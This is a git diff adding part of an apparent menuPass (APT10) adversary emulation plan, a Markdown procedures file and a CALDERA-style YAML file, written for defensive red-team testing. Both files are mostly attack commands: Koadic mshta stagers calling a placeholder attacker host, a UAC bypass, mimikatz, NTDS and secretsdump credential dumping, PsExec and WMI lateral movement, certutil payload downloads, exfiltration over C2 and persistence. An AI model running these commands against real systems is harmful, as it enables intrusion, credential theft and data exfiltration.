+### Procedures
+
+#### 2.A - User Execution: Malicious File ([T1204.002](https://attack.mitre.org/techniques/T1204/002/))
+
+menuPass is reported to have employed LNK files to achieve user execution.  These LNK files utilized scripting languages to invoke the Windows command line, download and execute tactical implants.<sup>[16](https://trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html)</sup>
+
+MSHTA was used to accomplish execution and situate the tactical implant, Koadic, in memory.  This tactical implant was used to conduct discovery, credential access, lateral movement.
+
+Attacker
+
+```cmd
+./koadic
+koadic: use stager/js/mshta
+(koadic: sta/js/mshta)# set SRVHOST #{ip_address}
+(koadic: sta/js/mshta)# set SRVPORT #{listening_port}
+(koadic: sta/js/mshta)# run
+[>] mshta http://#{ip_address/#{file_name}
+```
+
+Target
+
+```cmd
+C:\Users\Victim> mshta http://{#ip_address}/#{file_name}
+```
+
+#### 2.B (Optional)
+
+In some instances, soon after establishing C2, menuPass is reported to have introduced an additional implant to enhance operational capabilities.<sup>[15](http://blog.trendmicro.com/trendlabs-security-intelligence/chessmasters-new-strategy-evolving-tools-tactics/)</sup>  <sup>[16](https://trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html)</sup>  They did so by using Koadic to inject arbitrary shellcode into a process.  Excel must be present on the host to use this procedure.
+
+```cmd
+(koadic: sta/js/mshta)# use implant/inject/shellcode_excel
+(koadic: implant/inj/shellcode_excel)# set shellcode #{ASCIIhex_shellcode}
+(koadic: implant/inj/shellcode_excel)# set zombie #{zombie_id}
+(koadic: implant/inj/shellcode_excel)# run
+```
+## Step 3 - menuPass Discovery
+
+After achieving initial execution, menuPass actors are reported to have performed cursory situational awareness checks.  These checks are intended to determine suitability for implantation with a sustained implant.<sup>[16](https://trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html)</sup>
+
+### Procedures
+
+#### 3.A - System Network Configuration Discovery ([T1016](https://attack.mitre.org/techniques/T1016/)), System Network Connections Discovery ([T1049](https://attack.mitre.org/techniques/T1049/)) <sup>[16](https://trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html)</sup>
+
+Attacker
+
+```cmd
+(koadic: sta/js/mshta)# zombies
+(koadic: sta/js/mshta)# cmdshell #{zombie_id}
+C:\Users\Victim> ipconfig /all
+C:\Users\Victim> tasklist /v
+C:\Users\Victim> net view
+C:\Users\Victim> netstat -ano
+```
+
+#### 3.B
+
+```cmd
+(koadic: sta/js/mshta)# use implant/scan/tcp
+(koadic: imp/sca/tcp)# set rhosts #{remote_hosts}
+(koadic: imp/sca/tcp)# set rports #{ports_to_scan}
+(koadic: imp/sca/tcp)# set zombies #{zombie_id}
+(koadic: imp/sca/tcp)# run
+```
+
+## Step 4 - menuPass Privilege Escalation
+
+In Scenario 1, menuPass is presumed to have initially accessed the target environment using compromised credentials that granted elevated privileges.  As such, privilege escalation was not necessary.  menuPass is reported to have sought access to additional credentials to ensure freedom of movement throughout the domain.  This elevated access was a result of the method of initial access.
+
+Scenario 2 differs in this regard as the initial method of access is presumed to be phishing.  Phishing does not always result in elevated access.  As such, elevation to increase process integrity is required to use the tools that grant additional credential access.  As such, we suggest either "white carding" Administrative access or leveraging Koadic's "elevate" modules to attempt escalation.
+
+#### 4.A
+
+```cmd
+(koadic: sta/js/mshta)# use implant/elevate/bypassuac_eventvwr
+(koadic: implant/ele/bypassuac_eventvwr)# set payload #{payload_id}
+(koadic: implant/ele/bypassuac_eventvwr)# set zombie #{zombie_id}
+(koadic: implant/ele/bypassuac_eventvwr)# run
+```
+
+Check Privileges
+
+```cmd
+(koadic: implant/ele/bypassuac_eventvwr)# zombies #{zombie_id}
+```
+
+## Step 5 - menuPass Credential Access
+
+#### 5.A
+
+```cmd
+(koadic: sta/js/mshta)# use implant/inject/mimikatz_dotnet2js
+(koadic: imp/inj/mimikatz_dotnet2js)# set mimicmd #{mimikatz_command}
+(koadic: imp/inj/mimikatz_dotnet2js)# set zombie #{zombie_id}
+```
+
+#### 5.B - OS Credential Dumping: NTDS ([T1003.003](https://attack.mitre.org/techniques/T1003/003/))
+
+menuPass is reported to have sought access to additional credentials to ensure freedom of movement throughout the domain.
+
+```cmd
+(koadic: sta/js/mshta)# use implant/gather/hashdump_dc
+(koadic: imp/gat/hashdump_dc)# set lpath #{local_file_path}
+(koadic: imp/gat/hashdump_dc)# set drive #{drive_to_shadow_copy}
+(koadic: imp/gat/hashdump_dc)# set rpath #{remote_file_save_path}
+(koadic: imp/gat/hashdump_dc)# set certutil true
+(koadic: imp/gat/hashdump_dc)# set zombie #{zombie_id}
+(koadic: imp/gat/hashdump_dc)# run
+```
+
+### Alternative Procedure
+
+### Ntdsutil<sup>[32](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage)</sup>
+
+This procedure leverages a tool commonly featured on Windows Server, ntdsutil.exe, to dump the SYSTEM AND SECURITY registry hives from the domain controller.  These files will be copied to a specified directory and must be egressed from the network in order to dump credentials locally.  This procedure requires Administrative privileges and access to the domain controller but does not require credentials.
+
+Ntdsutil.exe must be present on the host.
+
+```cmd
+(koadic: sta/js/mshta)# cmdshell #{zombie_id}
+C:\Users\Victim> powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full C:\ProgramData\Temp' q q"
+```
+
+Download the file
+
+```cmd
+(koadic: sta/js/mshta)# use implant/utils/download_file
+(koadic: imp/uti/download_file)# set lpath #{local_file_save_path}
+(koadic: imp/uti/download_file)# set rfile #{file_to_download}
+(koadic: imp/uti/download_file)# set certutil true
+(koadic: imp/uti/download_file)# set zombie #{zombie_id}
+(koadic: imp/uti/download_file)# run
+```
+
+#### Dumping Credentials Locally
+After copying and exfiltrating the NTDS.dit file, you will use Impacket's secretsdump to dump credentials locally.
+
+```cmd
+secretsdump.exe -system #{system_hive_local_path\SYSTEM} -security #{security_hive_local_path\SECURITY} -ntds #{ntds_local_path\ntds.dit} local
+```
+
+## Step 6 - menuPass Lateral Movement
+
+#### 6.A - Windows Management Instrumentation ([T1047](https://attack.mitre.org/T1047/))
+
+```cmd
+(koadic: sta/js/mshta)# use implant/pivot/stage_wmi
+(koadic: implant/piv/stage_wmi)# set rhost #{remote_host}
+(koadic: implant/piv/stage_wmi)# set smbuser #{user_name}
+(koadic: implant/piv/stage_wmi)# set smbpass #{password}
+(koadic: implant/piv/stage_wmi)# set smbdomain #{domain}
+(koadic: implant/piv/stage_wmi)# set payload #{payload_id}
+(koadic: implant/piv/stage_wmi)# set zombie #{zombie_id}
+(koadic: implant/piv/stage_wmi)# run
+
+```
+
+#### Alternative Procedure
+
+### System Services: Service Execution ([T1569.002](https://attack.mitre.org/techniques/T1569/002))
+
+Upload PsExec to the host
+
+```cmd
+(koadic: sta/js/mshta)# use implant/utils/upload_file
+(koadic: imp/uti/upload_file)# set lfile #{local_file_to_upload}
+(koadic: imp/uti/upload_file)# set zombie #{zombie_id}
+(koadic: imp/uti/upload_file)# run
+```
+
+PsExec to remote host
+
+```cmd
+(koadic: sta/js/mshta)# use implant/pivot/exec_psexec
+(koadic: implant/piv/exec-psexec)# set cmd #{command_to_run}
+(koadic: implant/piv/exec-psexec)# set rhost #{remote_host}
+(koadic: implant/piv/exec-psexec)# set smbuser #{user_name}
+(koadic: implant/piv/exec-psexec)# set smbpass #{password}
+(koadic: implant/piv/exec-psexec)# set credid #{credential_ip}
+(koadic: implant/piv/exec-psexec)# set rpath #{remote_path_to_psexec}
+(koadic: implant/piv/exec-psexec)# set zombie #{zombie_id}
+(koadic: implant/piv/exec-psexec)# run
+```
+
+## Step 7 - menuPass Exfiltration
+
+#### 7.A - Exfiltration Over C2 Channel ([T1041](https://attack.mitre.org/techniques/T1041/))
+
+```cmd
+(koadic: sta/js/mshta)# use implant/utils/download_file
+(koadic: imp/uti/download_file)# set lpath #{local_file_save_path}
+(koadic: imp/uti/download_file)# set rfile #{file_to_download}
+(koadic: imp/uti/download_file)# set certutil true
+(koadic: imp/uti/download_file)# set zombie #{zombie_id}
+(koadic: imp/uti/download_file)# run
+```
+
+## Step 8 - menuPass Command and Control
+
+menuPass actors are reported to have introduced sustained malware to target networks.  Poison Ivy, PlugX, and more recently, the publicly available QuasarRat are reported to have been used by menuPass actors.<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup> <sup>[11](https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/)</sup> <sup>[13](https://blogs.blackberry.com/en/2019/06/threat-spotlight-menupass-quasarrat-backdoor)</sup>  <sup>[25](https://fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-)</sup> These implants provide the attacker with additional capabilities.  More importantly, these implants are used to ensure persistent access to the target network.
+
+menuPass actors are reported to have conducted ingress tool transfer using several different techniques.  You may choose to use Koadic's built-in functionality or leverage tools native to the Windows environment.  menuPass actors are reported to have done both.<sup>[15](http://blog.trendmicro.com/trendlabs-security-intelligence/chessmasters-new-strategy-evolving-tools-tactics/)</sup> <sup>[16](https://trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html)</sup>
+
+### Procedures
+
+#### 8.A - Ingress Tool Transfer ([T1105](https://attack.mitre.org/techniques/T1105/))
+
+menuPass may have accessed the command-line to use a tool native to the Windows environment (certutil) to download and decode additional capabilities.<sup>[16](https://trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html)</sup>
+
+```cmd
+(koadic: sta/js/mshta)# cmdshell #{zombie_id}
+C:\Users\Victim> certutil.exe -urlcache -split -f https://www.#{payload_server.com}/#{file}
+```
+
+#### Alternative Procedure - Koadic File Upload
+
+```cmd
+(koadic: sta/js/mshta)# use implant/utils/upload_file
+(koadic: imp/uti/upload_file)# set lfile #{local_file_to_upload}
+(koadic: imp/uti/upload_file)# set zombie #{zombie_id}
+(koadic: imp/uti/upload_file)# run
+```
+
+## Step 9 - menuPass Persistence
+
+menuPass actors are reported to have persisted both tactical and sustained malware.<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup> <sup>[5](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html)</sup> <sup>[11](https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/)</sup> <sup>[25](https://fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-)</sup>  Tactical malware should be thought of as the "work horse."  It is the tool used to accomplish tactical objectives and is therefore, more likely to be detected.  menuPass is reported to have been deliberate in the deployment and persistence of sustained malware.  These implants were employed to facilitate long-term access to target environments.<sup>[11](https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/)</sup>  Sustained malware was deployed to systems that afforded the ability to blend in, remain undetected, or facilitate access to a resource deemed essential.  Select your host for persistence carefully, and do not persist tactical and sustained implants on the same host.
+
+#### 9.A - Boot or Logon Autostart Execution: Registry Run Keys/Starup Folder ([T1547.001](https://attack.mitre.org/techniques/T1547/001/))
+
+Tactical Malware
+
+```cmd
+(koadic: sta/js/mshta)# use implant/persist/registry
+(koadic: imp/per/registry)# set payload #{payload_id}
+(koadic: imp/per/registry)# set zombie #{zombie_id}
+(koadic: imp/per/registry)# run
+```
+
+#### Alternative Procedure: Scheduled Task/Job: Scheduled Task ([T1053.005](https://attack.mitre.org/techniques/T1053/005))
+
+Tactical Malware
+
+```cmd
+(koadic: sta/js/mshta)# use implant/persist/schtasks
+(koadic: imp/per/schtasks)# set payload #{payload_id}
+(koadic: imp/per/schtasks)# set zombie #{zombie_id}
+(koadic: imp/per/schtasks)# run
+```
+
+Sustained Malware
+
+menuPass actors are reported to have persisted implants using several different procedures to include, creating scheduled tasks, registry keys, Windows services, and dropping LNK files in the Startup folder.<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup> <sup>[5](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html)</sup> <sup>[11](https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/)</sup> <sup>[25](https://fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-)</sup>  If you choose to use QuasarRAT as your sustained implant, may either select "Run Client when the computer starts" from the Client Builder menu when generating your implant or do so using the Windows command line.  QuasarRAT creates a registry run key and schedules a task in order to establish persistence.
+
+---
+
+## Additional Plan Resources
+
+- [Intelligence Summary](/menuPass/Intelligence_Summary.md)
+- [Operations Flow](/menuPass/Operations_Flow.md)
+- [Emulation Plan](/menuPass/Emulation_Plan/README.md)
+  - [Resource Development](/menuPass/Emulation_Plan/ResourceDevelopment.md)
+  - [Infrastructure](/menuPass/Emulation_Plan/Infrastructure.md)
+  - [Scenario 1](/menuPass/Emulation_Plan/Scenario1.md)
+  - [Scenario 2](/menuPass/Emulation_Plan/Scenario2.md)
+  - [YAML](/menuPass/Emulation_Plan/yaml)
+- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+- [Change Log](/menuPass/CHANGE_LOG.md)
\ No newline at end of file
diff --git a/menuPass/Emulation_Plan/yaml/README.md b/menuPass/Emulation_Plan/yaml/README.md
new file mode 100644
index 00000000..139b1677
--- /dev/null
+++ b/menuPass/Emulation_Plan/yaml/README.md
@@ -0,0 +1,26 @@
+# Machine-Readable menuPass Emulation Plans
+
+The universal, technology-agnostic version of the menuPass emulation plan YAML has been provided as starting point for machine readibility of the menuPass emulation plan. This folder will store all versions of this yaml file, including those formatted to work with specific execution runners (such as automated agents like [CALDERA](https://github.com/mitre/caldera) or other breach simulation frameworks).
+
+## Included Formats
+
+As new files are added, please list them in the below table.
+
+| File | Execution Framework | Notes |
+| --- | --- | --- |
+| [menuPass.yaml](/menuPass/Emulation_Plan/yaml/menuPass.yaml) | N/A | Initial Emulation Plan YAML |
+
+---
+
+## Additional Plan Resources
+
+- [Intelligence Summary](/menuPass/Intelligence_Summary.md)
+- [Operations Flow](/menuPass/Operations_Flow.md)
+- [Emulation Plan](/menuPass/Emulation_Plan/README.md)
+  - [Resource Development](/menuPass/Emulation_Plan/ResourceDevelopment.md)
+  - [Infrastructure](/menuPass/Emulation_Plan/Infrastructure.md)
+  - [Scenario 1](/menuPass/Emulation_Plan/Scenario1.md)
+  - [Scenario 2](/menuPass/Emulation_Plan/Scenario2.md)
+  - [YAML](/menuPass/Emulation_Plan/yaml)
+- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+- [Change Log](/menuPass/CHANGE_LOG.md)
\ No newline at end of file
diff --git a/menuPass/Emulation_Plan/yaml/menupass.yaml b/menuPass/Emulation_Plan/yaml/menupass.yaml
new file mode 100644
index 00000000..30fc9936
--- /dev/null
+++ b/menuPass/Emulation_Plan/yaml/menupass.yaml
@@ -0,0 +1,712 @@
+# menuPass.yaml - CALDERA and Atomic Style TTPs
+
+- emulation_plan_details:
+    id: b5192070-dff1-4134-bf66-c6b87c7498af
+    adversary_name: menuPass
+    adversary_description: menuPass is thought to be a Chinese cyber espionage group associated with activity directed by elements of the PRC MSS.
+    attack_version: 8.1
+    format_version: 1.0
+
+# Scenario 1, Step 2 - Command and Control
+
+- id: a750b196-8168-461a-8747-bdc4add107ac
+  name: Ingress Tool Transfer
+  description: Pushing tools to compromised host
+  tactic: discovery
+  technique:
+    attack_id: T1105
+    name: "Ingress Tool Transfer"
+  cti_source: https://recordedfuture.com/apt10-cyberespionage-campaign/
+  procedure_group: procedure_command_and_control
+  procedure_step: "2.A"
+  platforms:
+    windows:
+      psh:
+        command: |
+          Start-BitsTransfer -Source "http://#{bitsadmin_remote_ip}/#{bitsadmin_b64_encoded_string}" -Destination "C:\ProgramData\temp\#{bitsadmin_b64_encoded_string}"
+
+  input_arguments:
+    bitsadmin_remote_ip:
+      description: IP or hostname for remote connection
+      type: String
+      default: |
+        remote-host
+
+    bitsadmin_b64_encoded_string:
+      description: Sample Base 64 Encoded String
+      type: String
+      default: |
+        TWUEGJDITXAONVPUOWFV
+
+  executors:
+  - name: powershell
+    command: |
+      Start-BitsTransfer -Source "http://#{bitsadmin_remote_ip}/#{bitsadmin_b64_encoded_string}" -Destination "C:\ProgramData\temp\#{bitsadmin_b64_encoded_string}"
+
+# Scenario 1, Step 3: Discovery
+
+- id: 7877ec4d-3c11-40f2-9650-35261e4ac879
+  name: Network Share Discovery
+  description: Display network shares
+  tactic: discovery
+  technique:
+    attack_id: T1135
+    name: "Network Share Discovery"
+  cti_source: https://pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+  procedure_group: procedure_discovery
+  procedure_step: "3.A"
+  platforms:
+    windows:
+      cmd:
+        command: |
+          net use
+
+  executors:
+  - name: command_prompt
+    command: |
+      net use
+
+- id: e132a235-fe43-45c2-a334-2f235a7646b5
+  name: Remote System Discovery
+  description: Identify remote systems using net
+  tactic: discovery
+  technique:
+    attack_id: T1018
+    name: "Remote System Discovery"
+  cti_source: https://pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+  procedure_group: procedure_discovery
+  procedure_step: "3.B"
+  platforms:
+    windows:
+      cmd:
+        command: |
+          net view /domain
+
+  executors:
+  - name: command_prompt
+    command: |
+      net view /domain
+
+- id: d19678ac-3bca-475e-89d4-f452bfc2cc2a
+  name: Remote System Discovery
+  description: Identify remote system using Powershell
+  tactic: discovery
+  technique:
+    attack_id: T1018
+    name: "Remote System Discovery"
+  cti_source: https://pwc.co.uk/cyber-security/pdf/cloud-hopper-anex-b-final.pdf
+  procedure_group: procedure_discovery
+  procedure_step: "3.C"
+  platforms:
+    windows:
+      psh:
+        command: |
+          Test-NetConnection "#{host_address}"
+
+  input_arguments:
+    host_address:
+      description: IP for host discovery
+      type: String
+      default: |
+        192.0.2.10
+
+  executors:
+  - name: powershell
+    command: |
+      Test-NetConnection "#{host_address}"
+
+- id: b6026408-c815-47ca-bbb0-6b74591badc8
+  name: Network Service Scanning
+  description: Enumerate remote hosts for running services using tcping
+  tactic: discovery
+  technique:
+    attack_id: T1046
+    name: "Network Service Scanning"
+  cti_source: https://pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
+  procedure_group: procedure_discovery
+  procedure_step: "3.D"
+  platforms:
+    windows:
+      cmd:
+        command: |
+          "#{tcping_local_path}\tcping.exe" "#{tcping_remote_ip}" "#{tcping_remote_port}"
+        payloads:
+        - tcping.exe
+
+  input_arguments:
+    tcping_local_path:
+      description: Path of tcping.exe
+      type: Path
+      default: |
+        C:\Windows\Temp
+
+    tcping_url:
+      description: Path to download tcping.exe
+      type: URL
+      default: https://download.elifulkerson.com//files/tcping/0.39/tcping.exe
+
+    tcping_remote_ip:
+      description: Hostname or IP to enumerate with tcping.exe
+      type: String
+      default: |
+        192.0.2.10
+
+    tcping_remote_port:
+      description: Port to enumerate with tcping.exe
+      type: String
+      default: |
+        445
+
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      tcping.exe must exist on disk at specified location "#{tcping_local_path}"
+    prereq_command: |
+      if (Test-Path "#{tcping_local_path}\tcping.exe") {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest "#{tcping_url}" -OutFile "#{tcping_local_path}\tcping.exe"
+
+  executors:
+  - name: command_prompt
+    command: |
+      "#{tcping_local_path}\tcping.exe" "#{tcping_remote_ip}" "#{tcping_remote_port}"
+
+- id: 814005f7-c8d3-45c8-aea2-45758b2d6e90
+  name: System Network Configuration Discovery
+  description: Scan for nameservers and enumerate NetBIOS sessions
+  tactic: discovery
+  technique:
+    attack_id: T1016
+    name: "System Network Configuration Discovery"
+  cti_source: https://pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
+  procedure_group: procedure_discovery
+  procedure_step: "3.E"
+  platforms:
+    windows:
+      cmd:
+        command: |
+          "#{nbtscan_local_path}\nbtscan.exe" #{nbt_ip_range}
+        payloads:
+        - nbtscan.exe
+
+  input_arguments:
+    nbtscan_local_path:
+      description: Path of nbtscan.exe
+      type: Path
+      default: |
+        C:\Windows\Temp
+
+    nbtscan_url:
+      description: Path to download nbtscan.exe
+      type: URL
+      default: |
+        http://unixwiz.net/tools/nbtscan-1.0.35.exe
+
+    nbt_ip_range:
+      description: IP Range for nbtscan to enumerate
+      type: String
+      default: |
+        192.0.2.34/24
+
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      nbtscan.exe must exist on disk at specified location "#{nbtscan_local_path}"
+    prereq_command: |
+      if (Test-Path "#{nbtscan_local_path}\nbtscan.exe") {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest "#{nbtscan_url}" -OutFile "#{nbtscan_local_path}\nbtscan.exe"
+
+  executors:
+  - name: command_prompt
+    command: |
+      "#{nbtscan_local_path}\nbtscan.exe" #{nbt_ip_range}
+
+- id: 9d543214-6476-429a-9ca1-cf12233b808c
+  name: System Network Configuration Discovery
+  description: Scan for nameservers and enumerate NetBIOS sessions
+  tactic: discovery
+  technique:
+    attack_id: T1016
+    name: "System Network Configuration Discovery"
+  cti_source: https://pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
+  procedure_group: procedure_discovery
+  procedure_step: "3.F"
+  platforms:
+    windows:
+      cmd:
+        command: |
+          "#{netsess_local_path}\netsess.exe" #{netsess_remote_ip}
+        payloads:
+        - netsess.exe
+
+  input_arguments:
+    netsess_local_path:
+      description: Path of netsess.exe
+      type: Path
+      default: |
+        C:\Windows\Temp
+
+    netsess_url:
+      description: Path to download netsess.exe
+      type: URL
+      default: |
+        http://www.joeware.net/downloads/files/NetSess.zip
+
+    netsess_remote_ip:
+      description: IP or hostname to run netsess.exe against
+      type: String
+      default: |
+        192.0.2.10
+
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      netsess.exe must exist on disk at specified location "#{netsess_local_path}"
+    prereq_command: |
+      if (Test-Path "#{netsess_local_path}\netsess.exe") {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest "#{netsess_url}" -OutFile "#{netsess_local_path}\NetSess.zip"
+      Expand-Archive "#{netsess_local_path}\NetSess.zip" "#{netsess_local_path}\NetSess" -Force
+      Move-Item "#{netsess_local_path}\NetSess\netsess.exe" "#{netsess_local_path}\netsess.exe"
+      Remove-Item "#{netsess_local_path}\NetSess.zip", "#{netsess_local_path}\NetSess" -Recurse
+
+  executors:
+  - name: command_prompt
+    command: |
+      "#{netsess_local_path}\netsess.exe" #{netsess_remote_ip}
+
+# Scenario 1, Step 4: Credential Access
+
+- id: ffb50e17-cb3c-4424-a4e7-99e3885f22cc
+  name: OS Credential Dumping
+  description: menuPass has used mimikatz.exe to dump credentials locally
+  tactic: credential-access
+  technique:
+    attack_id: T1003.001
+    name: "OS Credential Dumping: LSASS Memory"
+  cti_source: https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf
+  procedure_group: procedure_cred_access
+  procedure_step: "4.A"
+  platforms:
+    windows:
+      cmd:
+        command: |
+          "#{mimikatz_local_path}\#{mimikatz_arch}\mimikatz.exe" "#{mimikatz_module}"
+        payloads:
+        - mimikatz.exe
+
+  input_arguments:
+    mimikatz_local_path:
+      description: Path of mimikatz
+      type: Path
+      default: |
+        C:\Windows\Temp
+
+    mimikatz_arch:
+      description: Architecture folder (Win32 or x64)
+      type: String
+      default: x64
+
+    mimikatz_url:
+      description: URL to download mimikatz.exe zip
+      type: URL
+      default: https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200917/mimikatz_trunk.zip
+
+    mimikatz_module:
+      description: Mimikatz module
+      type: String
+      default: |
+        sekurlsa::logonpasswords
+
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      mimikatz.exe must exist on disk at specified location "#{mimikatz_local_path}"
+    prereq_command: |
+      if (Test-Path "#{mimikatz_local_path}\#{mimikatz_arch}\mimikatz.exe") {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest "#{mimikatz_url}" -OutFile "#{mimikatz_local_path}\mimikatz.zip"
+      Expand-Archive "#{mimikatz_local_path}\mimikatz.zip" "#{mimikatz_local_path}" -Force
+      Remove-Item "#{mimikatz_local_path}\mimikatz.zip" -Force
+
+  executors:
+  - name: command_prompt
+    elevation_required: true
+    command: |
+      "#{mimikatz_local_path}\#{mimikatz_arch}\mimikatz.exe" "#{mimikatz_module}"
+
+- id: fe3d4de1-50bf-4241-9546-72dc757e696f
+  name: OS Credential Dumping
+  description: menuPass has used secretsdump.exe to dump credentials remotely
+  tactic: credential-access
+  technique:
+    attack_id: T1003.002
+    name: "OS Credential Dumping: Security Account Manager"
+  cti_source: https://pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
+  procedure_group: procedure_cred_access
+  procedure_step: "4.B"
+  platforms:
+    windows:
+      cmd:
+        command: |
+          "#{secretsdump_local_path}\secretsdump.exe" "#{secretsdump_domain}"/"#{secretsdump_user}":"#{secretsdump_pass}"@"#{secretsdump_remote_host}"
+        payloads:
+        - secretsdump.exe
+
+  input_arguments:
+    secretsdump_local_path:
+      description: Path of secretsdump.exe
+      type: Path
+      default: |
+        C:\Windows\Temp
+
+    secretsdump_url:
+      description: URL to download secretsdump.exe binary
+      type: URL
+      default: https://github.com/ropnop/impacket_static_binaries/releases/download/0.9.22.dev-binaries/secretsdump_windows.exe
+
+    secretsdump_domain:
+      description: Domain for secretsdump.exe command
+      type: String
+      default: DOMAIN
+
+    secretsdump_user:
+      description: User for secretsdump.exe command
+      type: String
+      default: Administrator
+
+    secretsdump_pass:
+      description: Password for secretsdump.exe command
+      type: String
+      default: Password123
+
+    secretsdump_remote_host:
+      description: Hostname or IP for secretsdump.exe connection
+      type: String
+      default: 192.0.2.10
+
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      secretsdump.exe must exist on disk at specified location "#{secretsdump_local_path}"
+    prereq_command: |
+      if (Test-Path "#{secretsdump_local_path}\secretsdump.exe") {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest "#{secretsdump_url}" -OutFile "#{secretsdump_local_path}\secretsdump.exe"
+
+  executors:
+  - name: command_prompt
+    elevation_required: true
+    command: |
+      "#{secretsdump_local_path}\secretsdump.exe" "#{secretsdump_domain}"/"#{secretsdump_user}":"#{secretsdump_pass}"@"#{secretsdump_remote_host}"
+
+# Scenario 1, Step 5: Lateral Movement
+
+- id: 4b1748e5-532c-453c-b195-557ce5550fef
+  name: Service Execution
+  description: Using compiled psexec.py to achieve remote code execution
+  tactic: lateral-movement
+  technique:
+    attack_id: T1569.002
+    name: "System Services: Service Execution"
+  cti_source: https://pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
+  procedure_group: procedure_lateral_movement
+  procedure_step: "5.A"
+  platforms:
+    windows:
+      cmd:
+        command: |
+          "#{psexec_local_path}\psexec.exe" "#{psexec_user}":"#{psexec_password}"@"#{psexec_remote_host}" "#{psexec_cmd}"
+        payloads:
+        - psexec.exe
+
+  input_arguments:
+    psexec_local_path:
+      description: Path of psexec.exe
+      type: Path
+      default: |
+        C:\Windows\Temp
+
+    psexec_url:
+      description: URL to download psexec.exe binary
+      type: URL
+      default: https://github.com/ropnop/impacket_static_binaries/releases/download/0.9.22.dev-binaries/psexec_windows.exe
+
+    psexec_user:
+      description: User for psexec authentication
+      type: String
+      default: |
+        Administrator
+
+    psexec_password:
+      description: Password for psexec authentication
+      type: String
+      default: |
+        badpassword123
+
+    psexec_remote_host:
+      description: IP or hostname for PsExec connection
+      type: String
+      default: |
+        192.0.2.10
+
+    psexec_cmd:
+      description: PsExec argument for specifying executable
+      type: String
+      default: |
+        -c d.exe
+
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      psexec.exe must exist on disk at specified location "#{psexec_local_path}"
+    prereq_command: |
+      if (Test-Path "#{psexec_local_path}\psexec.exe") {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest "#{psexec_url}" -OutFile "#{psexec_local_path}\psexec.exe"
+
+  executors:
+  - name: command_prompt
+    command: |
+      "#{psexec_local_path}\psexec.exe" "#{psexec_user}":"#{psexec_password}"@"#{psexec_remote_host}" "#{psexec_cmd}"
+
+# Scenario 1, Step 6: Collection
+
+- id: 160a1e0f-0f9b-49bb-a0fe-7e362b51737f
+  name: Archive Collected Data - Archive via Utility
+  description: Compress and stage data for exfiltration
+  tactic: collection
+  technique:
+    attack_id: T1560.001
+    name: "Archive Collected Data - Archive via Utility"
+  cti_source: https://pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+  procedure_group: procedure_collection
+  procedure_step: "6.A"
+  platforms:
+    windows:
+      cmd:
+        command: |
+          rar.exe a "#{rar_archive_name}" "#{rar_files}"
+        payloads:
+        - rar.exe
+
+  input_arguments:
+    rar_archive_name:
+      description: Name of rar archive
+      type: String
+      default: |
+        ss.rar
+
+    rar_files:
+      description: Path to files to compress
+      type: Path
+      default: |
+        C:\Windows\Temp
+
+  executors:
+  - name: command_prompt
+    command: |
+      rar.exe a "#{rar_archive_name}" "#{rar_files}"
+
+- id: b4fa6d2e-ed9c-4a86-81aa-19331983fe0d
+  name: Recycle Bin Staging
+  description: menuPass actors are thought to have staged archives in the Recycle Bin for exfiltration.
+  tactic: collection
+  technique:
+    attack_id: T1074.001
+    name: "Local Data Staging"
+  cti_source: https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+  procedure_group: procedure_collection
+  procedure_step: "6.B"
+  platforms:
+    windows:
+      cmd:
+        command: |
+          copy #{copy_filename} "C:\$Recycle.Bin\"
+
+  input_arguments:
+    copy_filename:
+      description: Name of file to copy
